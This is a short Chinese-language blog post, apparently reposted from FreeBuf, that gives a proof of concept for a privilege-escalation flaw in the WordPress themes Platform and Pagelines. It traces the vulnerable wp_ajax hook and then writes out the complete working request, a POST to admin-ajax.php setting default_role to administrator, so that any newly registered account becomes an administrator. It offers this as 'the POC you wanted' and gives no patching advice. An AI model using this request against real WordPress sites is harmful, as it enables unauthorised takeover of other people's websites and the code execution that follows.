知名WordPress主题Pagelines和Platform权限提升漏洞POC

在FreeBuf看到wordpress主题又爆漏洞了,此主题使用量还是很多的……现在你们要的POC来了。

漏洞简介

某个WordPress网站如果使用了Platform主题(版本号小于1.4.4),黑客就可以轻易取得该网站的权限。

黑客可以利用恶意软件、SEO垃圾邮件以及其他方式,执行PHP代码来感染你的网站。在使用了主题Pagelines(版本号小于1.4.6)的WordPress网站中,黑客只要注册一个账号,就可以使用权限提升exp进行攻击。提升权限后黑客可以做许多事,包括使用WordPress主题文件编辑器。 更多漏洞说明

主题版本Platform1.4.3

漏洞说明只给了一张图,不过已经说得很详细了。我只是写个过程。

20150312045230628

wp_ajax_pagelines_ajax_save_option和pagelines_ajax_save_option_callback是在一起的。

so,我们只要找到wp_ajax_pagelines_ajax_save_option就好了。

20150312045252708

文件:/wp-admin/admin-ajax.php

所以只要是wp_ajax钩子都可以调用,哪怕是订阅者权限。

一共一句话还要exp么?

POC(概念验证程序)

http://localhost//wp-admin/admin-ajax.php?action=pagelines_ajax_save_option

post:default_role=administrator

先注册一个号,然后提交。什么也不显示也对了。然后再注册一个号,就是管理员了。

关于第二代码执行,好像必须得管理员权限。

文章来源:freeBuf.com

发表评论

邮箱地址不会被公开。 必填项已用*标注